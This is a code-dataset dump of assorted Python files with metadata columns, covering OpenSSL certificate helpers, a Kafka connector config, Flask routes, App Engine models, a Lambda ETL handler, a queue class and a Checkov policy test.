# compute sha1 thumbprint of pfx
pfxdump = subprocess.check_output(
['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
'pass:' + passphrase]
)
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate(input=pfxdump)[0])
def get_sha1_thumbprint_pem(pemfile):
# type: (str) -> str
"""Get SHA1 thumbprint of PEM
:param str pfxfile: name of the pfx file to export
:rtype: str
:return: sha1 thumbprint of pem
"""
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate()[0])
def generate_pem_pfx_certificates(config):
# type: (dict) -> str
"""Generate a pem and a derived pfx file
:param dict config: configuration dict
:rtype: str
:return: sha1 thumbprint of pfx
"""
# gather input
pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
if pemfile is None:
pemfile = util.get_input('Enter public key PEM filename to create: ')
if pfxfile is None:
pfxfile = util.get_input('Enter PFX filename to create: ')
if passphrase is None:
while util.is_none_or_empty(passphrase):
passphrase = getpass.getpass('Enter password for PFX: ')
if len(passphrase) == 0:
print('passphrase cannot be empty')
privatekey = pemfile + '.key'
# generate pem file with private key and no password
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
try:
subprocess.check_call(
['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
'-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
logger.debug('created public key PEM file: {}'.format(pemfile))
# convert pem to pfx for Azure Batch service
subprocess.check_call(
['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
privatekey, '-in', f.name, '-certfile', f.name,
'-passin', 'pass:', '-passout', 'pass:' + passphrase]
)
logger.debug('created PFX file: {}'.format(pfxfile))
finally:
# remove rsa private key file
fp = pathlib.Path(privatekey)
if fp.exists():
fp.unlink()
# remove temp cert pem
fp = pathlib.Path(f.name)
if fp.exists():
fp.unlink()
# get sha1 thumbprint of pfx
return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
# type: (dict) -> tuple
"""Get PFX encryption settings from configuration
:param dict config: configuration settings
:rtype: tuple
:return: pfxfile, passphrase, sha1 tp
"""
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
sha1_cert_tp = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
config)
# manually get thumbprint of pfx if not exists in config
if util.is_none_or_empty(sha1_cert_tp):
if pfx_passphrase is None:
pfx_passphrase = getpass.getpass('Enter password for PFX: ')
sha1_cert_tp = get_sha1_thumbprint_pfx(pfxfile, pfx_passphrase)
settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
config, sha1_cert_tp)
return PfxSettings(
filename=pfxfile, passphrase=pfx_passphrase, sha1=sha1_cert_tp)
def _rsa_encrypt_string(data, config):
# type: (str, dict) -> str
"""RSA encrypt a string
:param str data: clear text data to encrypt
:param dict config: configuration dict
:rtype: str
:return: base64-encoded cipher text
"""
if util.is_none_or_empty(data):
raise ValueError('invalid data to encrypt')
inkey = settings.batch_shipyard_encryption_public_key_pem(config)
derived = False
if inkey is None:
# derive pem from pfx
derived = True
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
config)
inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
try:
if inkey is None:
raise RuntimeError('public encryption key is invalid')
proc = subprocess.Popen(
['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
ciphertext = util.base64_encode_string(
proc.communicate(input=util.encode_string(data))[0])
if proc.returncode != 0:
raise RuntimeError(
'openssl encryption failed with returncode: {}'.format(
proc.returncode))
return ciphertext
finally:
if derived:
fp = pathlib.Path(inkey)
if fp.exists():
fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
# type: (str, dict) -> str
"""RSA decrypt a string
:param str ciphertext: cipher text in base64
:param dict config: configuration dict
:rtype: str
:return: decrypted cipher text
"""
if util.is_none_or_empty(ciphertext):
raise ValueError('invalid ciphertext to decrypt')
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
if pemfile is None:
raise RuntimeError('cannot decrypt without valid private key')
cleartext = None
try:
data = util.base64_decode_string(ciphertext)
proc = subprocess.Popen(
['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cleartext = proc.communicate(input=data)[0]
finally:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
return cleartext
def encrypt_string(enabled, string, config):
# type: (bool, str, dict) -> str
"""Encrypt a string
:param bool enabled: if encryption is enabled
:param str string: string to encrypt
:param dict config: configuration dict
:rtype: str
:return: encrypted string if enabled
"""
if enabled:
return _rsa_encrypt_string(string, config)
else:
return string
| 35.311547 | 79 | 0.653258 | 2,038 | 16,208 | 5.052012 | 0.185476 | 0.028166 | 0.022727 | 0.03312 | 0.41521 | 0.379856 | 0.32566 | 0.271465 | 0.221445 | 0.197358 | 0 | 0.006029 | 0.24272 | 16,208 | 458 | 80 | 35.388646 | 0.832817 | 0.296088 | 0 | 0.363636 | 0 | 0 | 0.120575 | 0.008142 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064394 | false | 0.125 | 0.060606 | 0.003788 | 0.200758 | 0.049242 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0acf1290742f590cb6015abc57d74458d907cabb
| 1,164 |
py
|
Python
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | 1 |
2020-08-06T11:58:35.000Z
|
2020-08-06T11:58:35.000Z
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | 4 |
2019-12-13T11:27:28.000Z
|
2022-02-27T11:58:38.000Z
|
soil/build/lib/soil/openstack/snapshot.py
|
JackDan9/soil
|
ae612a4634634aace834491fbdefbc69e6167674
|
[
"MIT"
] | null | null | null |
# Copyright 2020 Soil, Inc.
from soil.openstack.base import DataBase
from soil.openstack.base import SourceBase
class SnapshotData(DataBase):
"""A class for openstack snapshot data"""
def __init__(self, data):
self.data = data['snapshot']
class Snapshot(SourceBase):
"""A class for openstack snapshot"""
def __init__(self, plugin, source_id):
super(Snapshot, self).__init__(plugin, source_id)
self._snapshot_obj = None
@property
def snapshot_obj(self):
if self._snapshot_obj is not None:
return self._snapshot_obj
self._snapshot_obj = SnapshotData(self.show())
return self._snapshot_obj
def show(self):
return self.plugin.cinder.show_snapshot(self.source_id)
def delete(self):
self.plugin.cinder.delete_snapshot(self.source_id)
def is_created(self):
snapshot_info = self.show()
status = snapshot_info['snapshot']['status']
if status in ('available', ):
return True
self._check_failed_status(status)
return False
def is_delete(self):
pass
| 25.304348 | 63 | 0.636598 | 138 | 1,164 | 5.108696 | 0.311594 | 0.102128 | 0.106383 | 0.059574 | 0.215603 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0047 | 0.2689 | 1,164 | 45 | 64 | 25.866667 | 0.823737 | 0.079897 | 0 | 0.071429 | 0 | 0 | 0.029245 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.035714 | 0.071429 | 0.035714 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0acf5c8efa495629dab15411d7c1138e6f73ca8f
| 1,417 |
py
|
Python
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 13 |
2021-03-11T00:25:22.000Z
|
2022-03-19T00:19:23.000Z
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 162 |
2021-03-09T01:52:11.000Z
|
2022-03-12T01:09:07.000Z
|
data_structures/queue/queue_on_pseudo_stack.py
|
hank-chou/python
|
a9f729fa263bce599d2774f3f6afb5a18bcc9862
|
[
"MIT"
] | 18 |
2020-02-09T13:00:11.000Z
|
2021-03-11T08:47:36.000Z
|
"""Queue represented by a pseudo stack (represented by a list with pop and append)"""
class Queue:
def __init__(self):
self.stack = []
self.length = 0
def __str__(self):
printed = "<" + str(self.stack)[1:-1] + ">"
return printed
"""Enqueues {@code item}
@param item
item to enqueue"""
def put(self, item):
self.stack.append(item)
self.length = self.length + 1
"""Dequeues {@code item}
@requirement: |self.length| > 0
@return dequeued
item that was dequeued"""
def get(self):
self.rotate(1)
dequeued = self.stack[self.length - 1]
self.stack = self.stack[:-1]
self.rotate(self.length - 1)
self.length = self.length - 1
return dequeued
"""Rotates the queue {@code rotation} times
@param rotation
number of times to rotate queue"""
def rotate(self, rotation):
for i in range(rotation):
temp = self.stack[0]
self.stack = self.stack[1:]
self.put(temp)
self.length = self.length - 1
"""Reports item at the front of self
@return item at front of self.stack"""
def front(self):
front = self.get()
self.put(front)
self.rotate(self.length - 1)
return front
"""Returns the length of this.stack"""
def size(self):
return self.length
| 24.431034 | 85 | 0.562456 | 180 | 1,417 | 4.383333 | 0.288889 | 0.152091 | 0.08365 | 0.076046 | 0.186312 | 0.058302 | 0 | 0 | 0 | 0 | 0 | 0.014463 | 0.316867 | 1,417 | 57 | 86 | 24.859649 | 0.80062 | 0.055752 | 0 | 0.133333 | 0 | 0 | 0.002158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.233333 | false | 0 | 0 | 0.033333 | 0.4 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad19b186920402498e9734534abe48d50e505b7
| 2,154 |
py
|
Python
|
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
src/producers/connector.py
|
cvelas31/public_transportation_streaming
|
903a1a147645e1b0783555db4bfc02098f7941ae
|
[
"MIT"
] | null | null | null |
"""Configures a Kafka Connector for Postgres Station data"""
import json
import logging
import requests
from settings import Settings
logger = logging.getLogger(__name__)
KAFKA_CONNECT_URL = f"{Settings.URLs.KAFKA_CONNECT_URL}/connectors"
CONNECTOR_NAME = "stations"
def configure_connector():
"""Starts and configures the Kafka Connect connector"""
logging.debug("Creating or updating kafka connect connector...")
resp = requests.get(f"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}")
if resp.status_code == 200:
logging.debug("Connector already created skipping recreation")
return
config = {
"connector.class": "io.confluent.connect.jdbc.JdbcSourceConnector",
"key.converter": "org.apache.kafka.connect.json.JsonConverter",
"key.converter.schemas.enable": "false",
"value.converter": "org.apache.kafka.connect.json.JsonConverter",
"value.converter.schemas.enable": "false",
"topic.prefix": "com.connect.transportation.",
"connection.url": "jdbc:postgresql://postgres:5432/cta",
"connection.user": "cta_admin",
"connection.password": "chicago",
"batch.max.rows": "500",
"table.whitelist": "stations",
"poll.interval.ms": "5000", # Poll every 5 seconds
"mode": "incrementing",
"incrementing.column.name": "stop_id",
}
# TODO: Complete the Kafka Connect Config below.
# Directions: Use the JDBC Source Connector to connect to Postgres. Load the `stations` table
# using incrementing mode, with `stop_id` as the incrementing column name.
# Make sure to think about what an appropriate topic prefix would be, and how frequently Kafka
# Connect should run this connector (hint: not very often!)
data = json.dumps({"name": CONNECTOR_NAME, "config": config})
resp = requests.post(
KAFKA_CONNECT_URL,
headers={"Content-Type": "application/json"},
data=data,
)
# Ensure a healthy response was given
resp.raise_for_status()
logging.info("-------Connector created successfully-------")
if __name__ == "__main__":
configure_connector()
| 35.311475 | 98 | 0.679201 | 248 | 2,154 | 5.774194 | 0.532258 | 0.083799 | 0.041899 | 0.032123 | 0.065642 | 0.065642 | 0.065642 | 0 | 0 | 0 | 0 | 0.008656 | 0.19545 | 2,154 | 60 | 99 | 35.9 | 0.817657 | 0.243733 | 0 | 0 | 0 | 0 | 0.469603 | 0.220223 | 0 | 0 | 0 | 0.016667 | 0 | 1 | 0.025641 | false | 0.025641 | 0.102564 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad4a301cbaa49708e90318cda5d0db992bcc1f1
| 354 |
py
|
Python
|
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
controllers/albums.py
|
jeonginlee/groove_scheduler
|
84e61834e940e2ff138ffeeea61fd301f3c2a244
|
[
"MIT"
] | null | null | null |
from flask import *
albums = Blueprint('albums', __name__, template_folder='templates')
@albums.route('/albums/edit')
def albums_edit_route():
options = {
"edit": True
}
return render_template("albums.html", **options)
@albums.route('/albums')
def albums_route():
options = {
"edit": False
}
return render_template("albums.html", **options)
| 19.666667 | 67 | 0.700565 | 42 | 354 | 5.666667 | 0.428571 | 0.138655 | 0.142857 | 0.218487 | 0.310924 | 0.310924 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129944 | 354 | 18 | 68 | 19.666667 | 0.772727 | 0 | 0 | 0.285714 | 0 | 0 | 0.180282 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.357143 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ad6db55250893c680ef209759e33e069cabdd9a
| 4,292 |
py
|
Python
|
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | 1 |
2017-04-26T18:51:43.000Z
|
2017-04-26T18:51:43.000Z
|
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
modules/stackoverflow/models.py
|
tjsavage/polymer-dashboard
|
19bc467f1206613f8eec646b6f2bc43cc319ef75
|
[
"CNRI-Python",
"Linux-OpenIB"
] | null | null | null |
import fix_path
import json
import datetime
from google.appengine.ext import ndb
# Taken from http://stackoverflow.com/questions/455580/json-datetime-between-python-and-javascript
dthandler = lambda obj: (
obj.isoformat()
if isinstance(obj, datetime.datetime)
or isinstance(obj, datetime.date)
else None
)
class StackOverflowSnapshot(ndb.Model):
"""Example Model"""
raw_timestamp = ndb.DateTimeProperty(required=True, auto_now_add=True)
requested_time = ndb.DateTimeProperty(required=True)
num_questions_by_tag = ndb.JsonProperty()
num_tagged_questions = ndb.IntegerProperty()
num_answered = ndb.IntegerProperty()
num_unanswered = ndb.IntegerProperty()
total_question_views = ndb.IntegerProperty()
status = ndb.StringProperty()
status_string = ndb.StringProperty()
def as_dict(self):
result = {}
result['requested_time'] = dthandler(self.requested_time)
result['num_tagged_questions'] = self.num_tagged_questions
result['num_questions_by_tag'] = self.num_questions_by_tag
result['num_answered'] = self.num_answered
result['num_unanswered'] = self.num_unanswered
result['total_question_views'] = self.total_question_views
result['status'] = self.status
result['status_string'] = self.status_string
return result
class StackOverflowQuestion(ndb.Model):
first_seen = ndb.DateTimeProperty(required=True, auto_now_add=True)
tags = ndb.StringProperty(repeated=True)
is_answered = ndb.BooleanProperty()
view_count = ndb.IntegerProperty()
answer_count = ndb.IntegerProperty()
url = ndb.StringProperty()
title = ndb.StringProperty()
creation_date = ndb.DateTimeProperty()
question_id = ndb.IntegerProperty()
def as_dict(self):
result = {}
result['first_seen'] = dthandler(self.first_seen)
result['tags'] = [t for t in self.tags]
result['is_answered'] = self.is_answered
result['view_count'] = self.view_count
result['answer_count'] = self.answer_count
result['url'] = self.url
result['title'] = self.title
result['creation_date'] = dthandler(self.creation_date)
result['question_id'] = self.question_id
return result
def update_to_stackexchange_question(self, stackexchange_question):
updated = False
if stackexchange_question.tags != self.tags:
self.tags = stackexchange_question.tags
updated = True
if stackexchange_question.json['is_answered'] != self.is_answered:
self.is_answered = stackexchange_question.json['is_answered']
updated = True
if stackexchange_question.view_count != self.view_count:
self.view_count = stackexchange_question.view_count
updated = True
if stackexchange_question.json['answer_count'] != self.answer_count:
self.answer_count = stackexchange_question.json['answer_count']
updated = True
if stackexchange_question.url != self.url:
self.url = stackexchange_question.url
updated = True
if stackexchange_question.title != self.title:
self.title = stackexchange_question.title
updated = True
if stackexchange_question.creation_date != self.creation_date:
self.creation_date = stackexchange_question.creation_date
updated = True
if stackexchange_question.json['question_id'] != self.question_id:
self.question_id = stackexchange_question.json['question_id']
updated = True
return updated
@classmethod
def from_stackexchange_question(cls, stackexchange_question):
result = cls(
tags = [t for t in stackexchange_question.tags],
is_answered = stackexchange_question.json['is_answered'],
view_count = stackexchange_question.view_count,
answer_count = stackexchange_question.json['answer_count'],
url = stackexchange_question.url,
title = stackexchange_question.title,
creation_date = stackexchange_question.creation_date,
question_id = stackexchange_question.json['question_id']
)
return result
| 40.490566 | 98 | 0.682199 | 467 | 4,292 | 6.012848 | 0.188437 | 0.209402 | 0.080128 | 0.064815 | 0.389601 | 0.259972 | 0.12963 | 0.032051 | 0 | 0 | 0 | 0.001807 | 0.226468 | 4,292 | 106 | 99 | 40.490566 | 0.843976 | 0.025862 | 0 | 0.16129 | 0 | 0 | 0.071839 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0 | 0.043011 | 0 | 0.344086 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0add5b092c6c665d2b618a20a05d4cd299d00402
| 1,948 |
py
|
Python
|
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
connection = ps.connect(dbname=dbname,
host=host,
port=port,
user=user,
password=password)
def handle(event, context):
cursor = connection.cursor()
cursor.execute("SELECT 1", ())
print(cursor.fetchall())
# Get key and bucket informaition
key = event['Records'][0]['s3']['object']['key']
bucket = event['Records'][0]['s3']['bucket']['name']
# use boto3 library to get object from S3
s3 = boto3.client('s3')
s3_object = s3.get_object(Bucket = bucket, Key = key)
data = s3_object['Body'].read().decode('utf-8')
all_lines = []
# read CSV
# csv_data = csv.reader(data.splitlines())
# for row in csv_data:
# datestr = row[0] #.replace('/', '-')
# # print(datestr)
# date_obj = datetime.strptime(datestr, '%d/%m/%Y %H:%M')
# # print(date_obj)
# # time = str(row[0][-5:])
# location = str(row[1])
# order = str(row[3])
# total = str(row[4])
# all_lines.append({'date':date_obj, 'location':location, 'order':order, 'total':total})
# return cached_list
# print(all_lines)
app.start_app(all_lines, data)
print_all_lines = [print(line) for line in all_lines]
print_all_lines
return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines)
| 31.419355 | 185 | 0.587269 | 259 | 1,948 | 4.324324 | 0.42471 | 0.064286 | 0.046429 | 0.026786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017446 | 0.264374 | 1,948 | 62 | 186 | 31.419355 | 0.764131 | 0.325975 | 0 | 0 | 0 | 0.032258 | 0.186191 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032258 | false | 0.064516 | 0.193548 | 0 | 0.258065 | 0.096774 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0ae19706ac78f27bbbf84e3668bc38423a4a2fcd
| 739 |
py
|
Python
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3 |
2015-05-04T03:20:09.000Z
|
2016-02-19T10:35:35.000Z
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3 |
2015-01-02T13:18:56.000Z
|
2021-02-08T20:17:14.000Z
|
feaas/runners/__init__.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 5 |
2015-01-02T13:11:45.000Z
|
2016-08-26T06:14:35.000Z
|
# Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import time
from feaas import storage
class Base(object):
def __init__(self, manager, interval, *locks):
self.manager = manager
self.storage = manager.storage
self.interval = interval
def init_locker(self, *lock_names):
self.locker = storage.MultiLocker(self.storage)
for lock_name in lock_names:
self.locker.init(lock_name)
def loop(self):
self.running = True
while self.running:
self.run()
time.sleep(self.interval)
def stop(self):
self.running = False
| 24.633333 | 57 | 0.649526 | 96 | 739 | 4.90625 | 0.5625 | 0.070064 | 0.055202 | 0.080679 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007421 | 0.270636 | 739 | 29 | 58 | 25.482759 | 0.866419 | 0.207037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0ae880533e14de2255d5554b8a0bb6b7cbc5e1bb
| 1,089 |
py
|
Python
|
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
Assignment 1 n 2 Day 8.py
|
paju3125/LetsUpgrade-Python-B7
|
c5767361f60f1ec405ab235af85035e2bb9a71e3
|
[
"Apache-2.0"
] | null | null | null |
# Assignment 1 Day 8
# write a decorator function for taking input for you
# any kind of function you want to build
def getInput(calculate_arg_fuc):
def wrap_function():
print("Enter two numbers ")
a=int(input("Enter first number = "))
b=int(input("Enter second number = "))
calculate_arg_fuc(a,b)
return wrap_function
@getInput
def addition(num1,num2):
print("Addition = ",num1+num2)
@getInput
def subtraction(num1,num2):
print("Subtraction = ",num1-num2)
@getInput
def multiplication(num1,num2):
print("Multiplication = ",num1*num2)
@getInput
def division(num1,num2):
print("Division = ",num1/num2)
addition()
subtraction()
multiplication()
division()
# Assignment 2 day 8
# you need to develop a python program to open a file in read only mode and
# try writing something to it and handlethe subsequent errorusing Exception Handling
try:
f=open("abc.txt","r");
f.write("Heyy, i am prajval");
f.close();
except:
print("File is in read only mode...")
| 22.22449 | 85 | 0.651974 | 146 | 1,089 | 4.821918 | 0.493151 | 0.090909 | 0.073864 | 0.080966 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024067 | 0.236915 | 1,089 | 48 | 86 | 22.6875 | 0.823105 | 0.264463 | 0 | 0.137931 | 0 | 0 | 0.226542 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.206897 | false | 0 | 0 | 0 | 0.241379 | 0.206897 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0af1a3c68967c05606abe6a22eb2bbc2a17f6f6f
| 1,164 |
py
|
Python
|
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
def test_summary(self):
runner = Runner()
current_dir = os.path.dirname(os.path.realpath(__file__))
# Used in
os.environ["sneaky_var"] = "*"
test_files_dir = current_dir + "/example_AdminPolicyDocument"
report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
summary = report.get_summary()
self.assertEqual(summary['passed'], 2,
f"Passed checks: {[fc.file_path for fc in report.passed_checks]}")
self.assertEqual(summary['failed'], 6,
f"Failed checks: {[fc.file_path for fc in report.failed_checks]}")
self.assertEqual(summary['skipped'], 0,
f"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}")
self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
unittest.main()
| 36.375 | 102 | 0.668385 | 137 | 1,164 | 5.445255 | 0.40146 | 0.080429 | 0.117962 | 0.064343 | 0.116622 | 0.116622 | 0.116622 | 0.116622 | 0 | 0 | 0 | 0.00441 | 0.22079 | 1,164 | 31 | 103 | 37.548387 | 0.818082 | 0.006014 | 0 | 0 | 0 | 0 | 0.232035 | 0.082251 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.045455 | false | 0.090909 | 0.227273 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
0af3eac5180ad01027c97600a407eb3106203f56
| 349 |
py
|
Python
|
pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | null | null | null |
